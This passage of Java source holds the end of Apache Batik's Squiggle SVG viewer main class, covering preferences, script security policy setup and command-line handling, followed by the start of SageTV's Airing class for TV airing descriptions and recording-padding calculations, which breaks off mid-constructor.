MAX_VISITED_URIS; /** * The arguments. */ protected String[] arguments; /** * Controls whether the application can override the * system security policy property. This is done when there * was no initial security policy specified when the application * started, in which case Batik will use that property. */ protected boolean overrideSecurityPolicy = false; /** * Script security enforcement is delegated to the * security utility */ protected ApplicationSecurityEnforcer securityEnforcer; /** * The option handlers. */ protected Map handlers = new HashMap(); { handlers.put("-font-size", new FontSizeHandler()); } /** * The viewer frames. */ protected List viewerFrames = new LinkedList(); /** * The preference dialog. */ protected PreferenceDialog preferenceDialog; /** * The UI specialization to use in the JSVGViewerFrames. 
*/ protected String uiSpecialization; /** * Creates a new application. * @param args The command-line arguments. */ public Main(String[] args) { arguments = args; if (Platform.isOSX) { uiSpecialization = "OSX"; // Move the menu bars to the top of the screen. System.setProperty("apple.laf.useScreenMenuBar", "true"); // Register listeners for the About and Preferences menu items // in the application menu (using reflection). try { Class Application = Class.forName("com.apple.eawt.Application"); Class ApplicationListener = Class.forName("com.apple.eawt.ApplicationListener"); Class ApplicationEvent = Class.forName("com.apple.eawt.ApplicationEvent"); Method getApplication = Application.getMethod("getApplication", new Class[0]); Method addApplicationListener = Application.getMethod("addApplicationListener", new Class[] { ApplicationListener }); final Method setHandled = ApplicationEvent.getMethod("setHandled", new Class[] { Boolean.TYPE }); Method setEnabledPreferencesMenu = Application.getMethod("setEnabledPreferencesMenu", new Class[] { Boolean.TYPE }); InvocationHandler listenerHandler = new InvocationHandler() { public Object invoke(Object proxy, Method method, Object[] args) { String name = method.getName(); if (name.equals("handleAbout")) { JSVGViewerFrame relativeTo = (JSVGViewerFrame) viewerFrames.get(0); AboutDialog dlg = new AboutDialog(relativeTo); // Work around pack() bug on some platforms dlg.setSize(dlg.getPreferredSize()); dlg.setLocationRelativeTo(relativeTo); dlg.setVisible(true); dlg.toFront(); } else if (name.equals("handlePreferences")) { JSVGViewerFrame relativeTo = (JSVGViewerFrame) viewerFrames.get(0); showPreferenceDialog(relativeTo); } else if (name.equals("handleQuit")) { // Do nothing, let the OS quit the app. 
} else { return null; } try { setHandled.invoke(args[0], new Object[] { Boolean.TRUE }); } catch (Exception e) { } return null; } }; Object application = getApplication.invoke(null, (Object[]) null); setEnabledPreferencesMenu.invoke(application, new Object[] { Boolean.TRUE }); Object listener = Proxy.newProxyInstance(Main.class.getClassLoader(), new Class[] { ApplicationListener }, listenerHandler); addApplicationListener.invoke(application, new Object[] { listener }); } catch (Exception ex) { ex.printStackTrace(); uiSpecialization = null; } } // // Preferences // Map defaults = new HashMap(11); defaults.put(PreferenceDialog.PREFERENCE_KEY_LANGUAGES, Locale.getDefault().getLanguage()); defaults.put(PreferenceDialog.PREFERENCE_KEY_SHOW_RENDERING, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_AUTO_ADJUST_WINDOW, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ENABLE_DOUBLE_BUFFERING, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_SHOW_DEBUG_TRACE, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_PROXY_HOST, ""); defaults.put(PreferenceDialog.PREFERENCE_KEY_PROXY_PORT, ""); defaults.put(PreferenceDialog.PREFERENCE_KEY_CSS_MEDIA, "screen"); defaults.put(PreferenceDialog.PREFERENCE_KEY_DEFAULT_FONT_FAMILY, DEFAULT_DEFAULT_FONT_FAMILY); defaults.put(PreferenceDialog.PREFERENCE_KEY_IS_XML_PARSER_VALIDATING, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ENFORCE_SECURE_SCRIPTING, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_FILE_ACCESS, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_NETWORK_ACCESS, Boolean.FALSE); defaults.put(PreferenceDialog.PREFERENCE_KEY_LOAD_JAVA, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_LOAD_ECMASCRIPT, Boolean.TRUE); defaults.put(PreferenceDialog.PREFERENCE_KEY_ALLOWED_SCRIPT_ORIGIN, ResourceOrigin.DOCUMENT); 
defaults.put(PreferenceDialog.PREFERENCE_KEY_ALLOWED_EXTERNAL_RESOURCE_ORIGIN, ResourceOrigin.ANY); defaults.put(PREFERENCE_KEY_VISITED_URI_LIST, ""); defaults.put(PREFERENCE_KEY_VISITED_URI_LIST_LENGTH, MAX_VISITED_URIS); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_MODE, 1); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_CPU, 0.75f); defaults.put(PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_FPS, (float) 10); defaults.put(PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET_ENABLED, Boolean.TRUE); securityEnforcer = new ApplicationSecurityEnforcer(this.getClass(), SQUIGGLE_SECURITY_POLICY); try { preferenceManager = new XMLPreferenceManager(SQUIGGLE_CONFIGURATION_FILE, defaults); String dir = System.getProperty(PROPERTY_USER_HOME); File f = new File(dir, BATIK_CONFIGURATION_SUBDIRECTORY); f.mkdir(); XMLPreferenceManager.setPreferenceDirectory(f.getCanonicalPath()); preferenceManager.load(); setPreferences(); initializeLastVisited(); Authenticator.setDefault(new JAuthenticator()); } catch (Exception e) { e.printStackTrace(); } // // Initialization // final AboutDialog initDialog = new AboutDialog(); ((BorderLayout) initDialog.getContentPane().getLayout()).setVgap(8); final JProgressBar pb = new JProgressBar(0, 3); initDialog.getContentPane().add(pb, BorderLayout.SOUTH); // Work around pack() bug on some platforms Dimension ss = initDialog.getToolkit().getScreenSize(); Dimension ds = initDialog.getPreferredSize(); initDialog.setLocation((ss.width - ds.width) / 2, (ss.height - ds.height) / 2); initDialog.setSize(ds); initDialog.setVisible(true); final JSVGViewerFrame v = new JSVGViewerFrame(this); JSVGCanvas c = v.getJSVGCanvas(); c.addSVGDocumentLoaderListener(new SVGDocumentLoaderAdapter() { public void documentLoadingStarted(SVGDocumentLoaderEvent e) { pb.setValue(1); } public void documentLoadingCompleted(SVGDocumentLoaderEvent e) { pb.setValue(2); } }); c.addGVTTreeBuilderListener(new GVTTreeBuilderAdapter() { 
public void gvtBuildCompleted(GVTTreeBuilderEvent e) { pb.setValue(3); } }); c.addGVTTreeRendererListener(new GVTTreeRendererAdapter() { public void gvtRenderingCompleted(GVTTreeRendererEvent e) { initDialog.dispose(); v.dispose(); System.gc(); run(); } }); c.setSize(100, 100); svgInitializationURI = Main.class.getResource(SVG_INITIALIZATION).toString(); c.loadSVGDocument(svgInitializationURI); } /** * Installs a custom policy file in the '.batik' directory. This is initialized * with the content of the policy file coming with the distribution */ public void installCustomPolicyFile() throws IOException { String securityPolicyProperty = System.getProperty(PROPERTY_JAVA_SECURITY_POLICY); if (overrideSecurityPolicy || securityPolicyProperty == null || "".equals(securityPolicyProperty)) { // Access default policy file ParsedURL policyURL = new ParsedURL(securityEnforcer.getPolicyURL()); // Override the user policy String dir = System.getProperty(PROPERTY_USER_HOME); File batikConfigDir = new File(dir, BATIK_CONFIGURATION_SUBDIRECTORY); File policyFile = new File(batikConfigDir, SQUIGGLE_POLICY_FILE); // Copy original policy file into local policy file Reader r = new BufferedReader(new InputStreamReader(policyURL.openStream())); Writer w = new FileWriter(policyFile); char[] buf = new char[1024]; int n = 0; while ( (n=r.read(buf, 0, buf.length)) != -1 ) { w.write(buf, 0, n); } r.close(); // Now, append additional grants depending on the security // settings boolean grantScriptNetworkAccess = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_NETWORK_ACCESS); boolean grantScriptFileAccess = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_GRANT_SCRIPT_FILE_ACCESS); if (grantScriptNetworkAccess) { w.write(POLICY_GRANT_SCRIPT_NETWORK_ACCESS); } if (grantScriptFileAccess) { w.write(POLICY_GRANT_SCRIPT_FILE_ACCESS); } w.close(); // We now use the JAVA_SECURITY_POLICY property, so // we allow override on subsequent calls. 
overrideSecurityPolicy = true; System.setProperty(PROPERTY_JAVA_SECURITY_POLICY, policyFile.toURI().toURL().toString()); } } /** * Runs the application. */ public void run() { try { int i = 0; for (; i < arguments.length; i++) { OptionHandler oh = (OptionHandler)handlers.get(arguments[i]); if (oh == null) { break; } i = oh.handleOption(i); } JSVGViewerFrame frame = createAndShowJSVGViewerFrame(); while (i < arguments.length) { if (arguments[i].length() == 0) { i++; continue; } File file = new File(arguments[i]); String uri = null; try{ if (file.canRead()) { uri = file.toURI().toURL().toString(); } }catch(SecurityException se){ // Cannot access files. } if(uri == null){ uri = arguments[i]; ParsedURL purl = null; purl = new ParsedURL(arguments[i]); if (!purl.complete()) // This is not a valid uri uri = null; } if (uri != null) { if (frame == null) frame = createAndShowJSVGViewerFrame(); frame.showSVGDocument(uri); frame = null; } else { // Let the user know that we are // skipping this file... // Note that frame may be null, which is // a valid argument for showMessageDialog // NOTE: Need to revisit Resources/Messages usage to // have a single entry point. Should have a // formated message here instead of a + ... JOptionPane.showMessageDialog (frame, resources.getString("Error.skipping.file") + arguments[i]); } i++; } } catch (Exception e) { e.printStackTrace(); printUsage(); } } /** * Prints the command line usage. */ protected void printUsage() { System.out.println(); System.out.println(resources.getString("Command.header")); System.out.println(resources.getString("Command.syntax")); System.out.println(); System.out.println(resources.getString("Command.options")); for (Object o : handlers.keySet()) { String s = (String) o; System.out.println(((OptionHandler) handlers.get(s)).getDescription()); } } /** * This interface represents an option handler. */ protected interface OptionHandler { /** * Handles the current option. 
* @return the index of argument just before the next one to handle. */ int handleOption(int i); /** * Returns the option description. */ String getDescription(); } /** * To handle the '-font-size' option. */ protected class FontSizeHandler implements OptionHandler { public int handleOption(int i) { int size = Integer.parseInt(arguments[++i]); Font font = new Font("Dialog", Font.PLAIN, size); FontUIResource fontRes = new FontUIResource(font); UIManager.put("CheckBox.font", fontRes); UIManager.put("PopupMenu.font", fontRes); UIManager.put("TextPane.font", fontRes); UIManager.put("MenuItem.font", fontRes); UIManager.put("ComboBox.font", fontRes); UIManager.put("Button.font", fontRes); UIManager.put("Tree.font", fontRes); UIManager.put("ScrollPane.font", fontRes); UIManager.put("TabbedPane.font", fontRes); UIManager.put("EditorPane.font", fontRes); UIManager.put("TitledBorder.font", fontRes); UIManager.put("Menu.font", fontRes); UIManager.put("TextArea.font", fontRes); UIManager.put("OptionPane.font", fontRes); UIManager.put("DesktopIcon.font", fontRes); UIManager.put("MenuBar.font", fontRes); UIManager.put("ToolBar.font", fontRes); UIManager.put("RadioButton.font", fontRes); UIManager.put("RadioButtonMenuItem.font", fontRes); UIManager.put("ToggleButton.font", fontRes); UIManager.put("ToolTip.font", fontRes); UIManager.put("ProgressBar.font", fontRes); UIManager.put("TableHeader.font", fontRes); UIManager.put("Panel.font", fontRes); UIManager.put("List.font", fontRes); UIManager.put("ColorChooser.font", fontRes); UIManager.put("PasswordField.font", fontRes); UIManager.put("TextField.font", fontRes); UIManager.put("Table.font", fontRes); UIManager.put("Label.font", fontRes); UIManager.put("InternalFrameTitlePane.font", fontRes); UIManager.put("CheckBoxMenuItem.font", fontRes); return i; } public String getDescription() { return resources.getString("Command.font-size"); } } // Application /////////////////////////////////////////////// /** * Creates and shows a new 
viewer frame. */ public JSVGViewerFrame createAndShowJSVGViewerFrame() { JSVGViewerFrame mainFrame = new JSVGViewerFrame(this); mainFrame.setSize(resources.getInteger("Frame.width"), resources.getInteger("Frame.height")); mainFrame.setIconImage(frameIcon.getImage()); mainFrame.setTitle(resources.getString("Frame.title")); mainFrame.setVisible(true); viewerFrames.add(mainFrame); setPreferences(mainFrame); return mainFrame; } /** * Closes the given viewer frame. */ public void closeJSVGViewerFrame(JSVGViewerFrame f) { f.getJSVGCanvas().stopProcessing(); viewerFrames.remove(f); if (viewerFrames.size() == 0) { System.exit(0); } f.dispose(); } /** * Creates a new application exit action. */ public Action createExitAction(JSVGViewerFrame vf) { return new AbstractAction() { public void actionPerformed(ActionEvent e) { System.exit(0); } }; } /** * Opens the given link in a new window. */ public void openLink(String url) { JSVGViewerFrame f = createAndShowJSVGViewerFrame(); f.getJSVGCanvas().loadSVGDocument(url); } /** * Returns the XML parser class name. */ public String getXMLParserClassName() { return XMLResourceDescriptor.getXMLParserClassName(); } /** * Returns true if the XML parser must be in validation mode, false * otherwise. */ public boolean isXMLParserValidating() { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_IS_XML_PARSER_VALIDATING); } /** * Shows the preference dialog. 
*/ public void showPreferenceDialog(JSVGViewerFrame f) { if (preferenceDialog == null) { preferenceDialog = new PreferenceDialog(f, preferenceManager); } if (preferenceDialog.showDialog() == PreferenceDialog.OK_OPTION) { try { preferenceManager.save(); setPreferences(); } catch (Exception e) { } } } private void setPreferences() throws IOException { for (Object viewerFrame : viewerFrames) { setPreferences((JSVGViewerFrame) viewerFrame); } System.setProperty("proxyHost", preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_PROXY_HOST)); System.setProperty("proxyPort", preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_PROXY_PORT)); installCustomPolicyFile(); securityEnforcer.enforceSecurity (preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_ENFORCE_SECURE_SCRIPTING) ); } private void setPreferences(JSVGViewerFrame vf) { boolean db = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_ENABLE_DOUBLE_BUFFERING); vf.getJSVGCanvas().setDoubleBufferedRendering(db); boolean sr = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SHOW_RENDERING); vf.getJSVGCanvas().setProgressivePaint(sr); boolean d = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SHOW_DEBUG_TRACE); vf.setDebug(d); boolean aa = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_AUTO_ADJUST_WINDOW); vf.setAutoAdjust(aa); boolean dd = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE); vf.getJSVGCanvas().setSelectionOverlayXORMode(dd); int al = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_MODE); if (al < 0 || al > 2) { al = 1; } switch (al) { case 0: // none vf.getJSVGCanvas().setAnimationLimitingNone(); break; case 1: { // %cpu float pc = preferenceManager.getFloat (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_CPU); if (pc <= 0f || pc > 1.0f) { pc = 0.75f; } vf.getJSVGCanvas().setAnimationLimitingCPU(pc); break; } case 2: { // fps float fps = 
preferenceManager.getFloat (PreferenceDialog.PREFERENCE_KEY_ANIMATION_RATE_LIMITING_FPS); if (fps <= 0f) { fps = 10f; } vf.getJSVGCanvas().setAnimationLimitingFPS(fps); break; } } } /** * Returns the user languages. */ public String getLanguages() { String s = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_LANGUAGES); return (s == null) ? Locale.getDefault().getLanguage() : s; } /** * Returns the user stylesheet uri. * @return null if no user style sheet was specified. */ public String getUserStyleSheetURI() { boolean enabled = preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET_ENABLED); String ssPath = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_USER_STYLESHEET); if (!enabled || ssPath.length() == 0) { return null; } try { File f = new File(ssPath); if (f.exists()) { return f.toURI().toURL().toString(); } } catch (IOException ioe) { // Nothing... } return ssPath; } /** * Returns the default value for the CSS * "font-family" property */ public String getDefaultFontFamily() { return preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_DEFAULT_FONT_FAMILY); } /** * Returns the CSS media to use. * @return empty string if no CSS media was specified. */ public String getMedia() { String s = preferenceManager.getString (PreferenceDialog.PREFERENCE_KEY_CSS_MEDIA); return (s == null) ? "screen" : s; } /** * Returns true if the selection overlay is painted in XOR mode, false * otherwise. */ public boolean isSelectionOverlayXORMode() { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_SELECTION_XOR_MODE); } /** * Returns true if the input scriptType can be loaded in * this application. 
*/ public boolean canLoadScriptType(String scriptType){ if (SVGConstants.SVG_SCRIPT_TYPE_ECMASCRIPT.equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_APPLICATION_ECMASCRIPT .equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_JAVASCRIPT.equals(scriptType) || SVGConstants.SVG_SCRIPT_TYPE_APPLICATION_JAVASCRIPT .equals(scriptType)) { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_LOAD_ECMASCRIPT); } else if (SVGConstants.SVG_SCRIPT_TYPE_JAVA.equals(scriptType)) { return preferenceManager.getBoolean (PreferenceDialog.PREFERENCE_KEY_LOAD_JAVA); } else { return preferenceManager.getBoolean (scriptType + UNKNOWN_SCRIPT_TYPE_LOAD_KEY_EXTENSION); } } /** * Returns the allowed origins for scripts. * @see ResourceOrigin */ public int getAllowedScriptOrigin() { int ret = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ALLOWED_SCRIPT_ORIGIN); return ret; } /** * Returns the allowed origins for external * resources. * @see ResourceOrigin */ public int getAllowedExternalResourceOrigin() { int ret = preferenceManager.getInteger (PreferenceDialog.PREFERENCE_KEY_ALLOWED_EXTERNAL_RESOURCE_ORIGIN); return ret; } /** * Notifies Application of recently visited URI */ public void addVisitedURI(String uri) { if(svgInitializationURI.equals(uri)) { return; } int maxVisitedURIs = preferenceManager.getInteger (PREFERENCE_KEY_VISITED_URI_LIST_LENGTH); if (maxVisitedURIs < 0) { maxVisitedURIs = 0; } if (lastVisited.contains(uri)) { lastVisited.removeElement(uri); } while (lastVisited.size() > 0 && lastVisited.size() > (maxVisitedURIs-1)) { lastVisited.removeElementAt(0); } if (maxVisitedURIs > 0) { lastVisited.addElement(uri); } // Now, save the list of visited URL into the preferences StringBuffer lastVisitedBuffer = new StringBuffer( lastVisited.size() * 8 ); for (Object aLastVisited : lastVisited) { try { lastVisitedBuffer.append (URLEncoder.encode(aLastVisited.toString(), Charset.defaultCharset().name())); } catch (UnsupportedEncodingException e) { throw 
new RuntimeException(e); } lastVisitedBuffer.append(URI_SEPARATOR); } preferenceManager.setString (PREFERENCE_KEY_VISITED_URI_LIST, lastVisitedBuffer.toString()); try { preferenceManager.save(); } catch (Exception e) { // As in other places. But this is ugly... } } /** * Asks Application for a list of recently visited URI. */ public String[] getVisitedURIs() { String[] visitedURIs = new String[lastVisited.size()]; lastVisited.toArray(visitedURIs); return visitedURIs; } /** * Returns the UI resource specialization to use. */ public String getUISpecialization() { return uiSpecialization; } /** * Initializes the lastVisited array */ protected void initializeLastVisited(){ String lastVisitedStr = preferenceManager.getString(PREFERENCE_KEY_VISITED_URI_LIST); StringTokenizer st = new StringTokenizer(lastVisitedStr, URI_SEPARATOR); int n = st.countTokens(); int maxVisitedURIs = preferenceManager.getInteger (PREFERENCE_KEY_VISITED_URI_LIST_LENGTH); if (n > maxVisitedURIs) { n = maxVisitedURIs; } for (int i=0; i<n; i++) { try { lastVisited.addElement(URLDecoder.decode(st.nextToken(), Charset.defaultCharset().name())); } catch (UnsupportedEncodingException e) { throw new RuntimeException(e); } } } }
google/sagetv
35,712
java/sage/Airing.java
/* * Copyright 2015 The SageTV Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package sage; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.io.UnsupportedEncodingException; import java.util.ArrayList; import java.util.Comparator; import java.util.Date; import java.util.List; import java.util.Map; import java.util.regex.Pattern; public class Airing extends DBObject implements Schedulable { public static final long MILLIS_PER_HOUR = 60*60*1000L; public String getFullString() { StringBuilder sb = new StringBuilder(); Show myShow = getShow(); if (myShow == null) return Sage.rez("InvalidAiring"); sb.append(myShow.getTitle()); if (myShow.getEpisodeName().length() > 0) { sb.append(" - "); sb.append(myShow.getEpisodeName()); } sb.append('\n'); if (myShow.getDesc().length() > 0) { sb.append(myShow.getDesc()); sb.append('\n'); } boolean extras = false; if (myShow.categories.length > 0) { extras = true; sb.append(myShow.getCategory()); if (myShow.categories.length > 1) { sb.append('/'); sb.append(myShow.getSubCategory()); } sb.append(' '); } if (myShow.year != null) { extras = true; sb.append(myShow.getYear()); sb.append(' '); } if (myShow.rated != null) { extras = true; sb.append(myShow.getRated()); sb.append(' '); } if (myShow.pr != null) { extras = true; sb.append(myShow.getParentalRating()); sb.append(' '); } if (isFirstRun()) { extras = true; sb.append(Sage.rez("FirstRun") + " "); } String[] bon = 
myShow.getBonuses(); for (int i = 0; i < bon.length; i++) { extras = true; sb.append(bon[i]); sb.append(' '); } if (extras) sb.append('\n'); return sb.toString(); } public String getPartialString() { StringBuilder sb = new StringBuilder(); Show myShow = getShow(); if (myShow != null) { sb.append(myShow.getTitle()); if (myShow.getEpisodeName().length() > 0) { sb.append("-"); sb.append(myShow.getEpisodeName()); } else if (myShow.getDesc().length() > 0 && myShow.getDesc().length() < 32) { sb.append("-"); sb.append(myShow.getDesc()); } sb.append('\n'); } sb.append(Sage.rez("Airing_Duration_Channel_Time", new Object[] { Sage.durFormatHrMinPretty(duration), (getChannel() != null ? (getChannelNum(0) + ' ' + getChannel().getName()) : getChannelNum(0)), ZClock.getSpecialTimeString(new Date(time)) })); return sb.toString(); } public String getShortString() { StringBuilder sb = new StringBuilder(); if (isMusic()) { Show myShow = getShow(); if (myShow == null) return Sage.rez("Unknown"); for (int i = 0; i < myShow.people.length; i++) { if (myShow.roles[i] == Show.ARTIST_ROLE) { if (myShow.getEpisodeName().length() > 0) { sb.append(Sage.rez("Song_By_Artist", new Object[] { myShow.getEpisodeName(), myShow.people[i].name})); } else { sb.append(myShow.people[i].name); } break; } } if (sb.length() == 0) return myShow.getEpisodeName(); if (sb.length() == 0) return Sage.rez("Unknown"); } else { sb.append(Sage.rez("Airing_Title_Time_Channel", new Object[] { getTitle(), ZClock.getSpecialTimeString(new Date(time)), (getChannel() != null ? (getChannelNum(0) + ' ' + getChannel().getName()) : getChannelNum(0)), })); } return sb.toString(); } public String getChannelNum(long providerID) { EPG epg = EPG.getInstance(); long[] provIDs = (providerID == 0) ? 
epg.getAllProviderIDs() : new long[] { providerID }; String rv = null; for (int i = 0; i < provIDs.length; i++) { String[] nums = epg.getChannels(provIDs[i], stationID); for (int j = 0; j < nums.length; j++) { if (nums[j].length() > 0) { rv = nums[j]; EPGDataSource epgds = epg.getSourceForProviderID(provIDs[i]); if (epgds != null && epgds.canViewStationOnChannel(stationID, nums[j])) return rv; } } } return rv == null ? "" : rv; } public int getStationID() { return stationID; } public long getStartTime() { return time; } public long getDuration() { return duration; } public long getEndTime() { return time + duration; } /** * @return First Run state - defined as Live or New or within 28 days of the Original Air Date. */ public boolean isFirstRun() { Show s = getShow(); return ((miscB & (LIVE_MASK | NEW_MASK)) != 0) || (s != null && ((time - s.originalAirDate) < 28 * Sage.MILLIS_PER_DAY)); } /** * Get adjusted the starting time for this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. 
* * @return Adjusted starting time for this airing */ public long getSchedulingStart() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.getStartTime(); Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || bond.startPad == 0) return time; // For Favorites that are back-to-back, we don't apply any padding at that junction if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingStart(bond); } return (time - bond.startPad); } private long getAdjustedSchedulingStart(Agent bond) { Airing priorAir = Wizard.getInstance().getTimeRelativeAiring(this, -1); ManualRecord priorMR = null; if (priorAir != this && Carny.getInstance().isLoveAir(priorAir)) { if ((priorMR = Wizard.getInstance().getManualRecord(priorAir)) != null) { if (time - bond.startPad >= priorMR.getEndTime()) { return time - bond.startPad; } else { return Math.max(time - bond.startPad, Math.min(time, priorMR.getEndTime())); } } else if (!priorAir.isWatchedForSchedulingPurpose()) { Agent priorBond = Carny.getInstance().getCauseAgent(priorAir); if (priorBond != null) { // See if there's actually a conflict here that needs to be removed, don't remove padding if // we don't have to if (time - bond.startPad >= priorAir.time + priorAir.duration + priorBond.stopPad) { return time - bond.startPad; } else { return Math.max(time - bond.startPad, Math.min(time, priorAir.time + priorAir.duration + priorBond.stopPad)); } } } } return time - bond.startPad; } /** * Get adjusted the full duration of this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. 
* * @return Adjusted full duration time of this airing */ public long getSchedulingDuration() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.duration; Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || (bond.stopPad == 0 && bond.startPad == 0)) return duration; if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingEnd(bond) - getAdjustedSchedulingStart(bond); } return duration + bond.stopPad + bond.startPad; } /** * Get adjusted the ending time for this airing. * <p/> * For Favorites that are back-to-back, we don't apply any padding at that junction. * * @return Adjusted ending time for this airing */ public long getSchedulingEnd() { ManualRecord mr = Wizard.getInstance().getManualRecord(this); if (mr != null) return mr.getEndTime(); Agent bond = Carny.getInstance().getCauseAgent(this); if (bond == null || bond.stopPad == 0) return time + duration; else if (!SeekerSelector.USE_BETA_SEEKER && Carny.getInstance().isLoveAir(this) && Sage.getBoolean("remove_padding_on_back_to_back_favorites", true)) { return getAdjustedSchedulingEnd(bond); } return time + duration + bond.stopPad; } private long getAdjustedSchedulingEnd(Agent bond) { Airing nextAir = Wizard.getInstance().getTimeRelativeAiring(this, 1); ManualRecord nextMR = null; if (nextAir != this && Carny.getInstance().isLoveAir(nextAir)) { if ((nextMR = Wizard.getInstance().getManualRecord(nextAir)) != null) { if (time + duration + bond.stopPad <= nextMR.getStartTime()) { return time + duration + bond.stopPad; } else { return Math.min(time + duration + bond.stopPad, Math.max(time + duration, nextMR.getStartTime())); } } else if (!nextAir.isWatchedForSchedulingPurpose()) { Agent nextBond = Carny.getInstance().getCauseAgent(nextAir); if (nextBond != null) { // See if there's actually a conflict here that needs to be removed, don't 
remove padding if // we don't have to if (time + duration + bond.stopPad <= nextAir.time - nextBond.startPad) { return time + duration + bond.stopPad; } else { return Math.min(time + duration + bond.stopPad, Math.max(time + duration, nextAir.time - nextBond.startPad)); } } } } return time + duration + bond.stopPad; } @Override boolean validate() { getShow(); if (myShow == null) return false; // Be sure all the objects below us have our mask applied to them if (getMediaMask() != 0 && Wizard.GENERATE_MEDIA_MASK) myShow.addMediaMaskRecursive(getMediaMask()); return true; } public Show getShow() { return (myShow != null) ? myShow : (myShow = Wizard.getInstance().getShowForID(showID)); } public int getShowID() { return showID; } public long getTTA() { return Math.max(0, time - Sage.time()); } public Channel getChannel() { return Wizard.getInstance().getChannelForStationID(stationID); } public String getChannelName() { Channel c = getChannel(); return (c == null) ? "" : c.name; } public boolean doesOverlap(Airing testMe) { return ((testMe.getEndTime() > time) && (testMe.time < getEndTime())); } public boolean doesOverlap(long startTime, long endTime) { return (endTime > time) && (startTime < getEndTime()); } public boolean doesSchedulingOverlap(Airing testMe) { return ((testMe.getSchedulingEnd() > getSchedulingStart()) && (testMe.getSchedulingStart() < getSchedulingEnd())); } public boolean doesSchedulingOverlap(long startTime, long endTime) { return (endTime > getSchedulingStart()) && (startTime < getSchedulingEnd()); } public boolean isWatched() { return BigBrother.isWatched(this); } public boolean isWatchedForSchedulingPurpose() { return BigBrother.isWatched(this, true); } public boolean isViewable() { return EPG.getInstance().canViewStation(stationID); } public Airing[] getNextWatchableAirings(long afterTime) { afterTime = Math.min(afterTime, time); Show myShow = getShow(); if (myShow == null) return Pooler.EMPTY_AIRING_ARRAY; Airing[] showAirs = 
Wizard.getInstance().getAirings(myShow, afterTime); List<Airing> rv = new ArrayList<Airing>(); for (int i = 0; i < showAirs.length; i++) { if (showAirs[i].isTV() && showAirs[i].isViewable()) rv.add(showAirs[i]); } return rv.toArray(Pooler.EMPTY_AIRING_ARRAY); } public boolean hasLaterWatchableAiring() { Show myShow = getShow(); if (myShow == null) return false; Airing[] showAirs = Wizard.getInstance().getAirings(myShow, getEndTime()); for (int i = 0; i < showAirs.length; i++) { if (showAirs[i].isTV() && showAirs[i].isViewable()) return true; } return false; } public boolean isMustSee() { return Profiler.isMustSee(this); } public boolean isDontLike() { Show myShow = getShow(); if (myShow != null && myShow.isDontLike()) return true; Wasted w = Wizard.getInstance().getWastedForAiring(id); return (w != null) && w.isManual(); } @Override void update(DBObject fromMe) { Airing a = (Airing) fromMe; if (showID != a.showID) myShow = null; showID = a.showID; time = a.time; duration = a.duration; partsB = a.partsB; miscB = a.miscB; prB = a.prB; stationID = a.stationID; persist = a.persist; super.update(fromMe); } Airing(int inID) { super(inID); } Airing(DataInput in, byte ver, Map<Integer, Integer> idMap) throws IOException { super(in, ver, idMap); showID = readID(in, idMap); stationID = in.readInt(); time = in.readLong(); duration = in.readLong(); if (duration < 0) { Wizard.INVALID_AIRING_DURATIONS = true; if (Sage.DBG) System.out.println("BAD AIRING 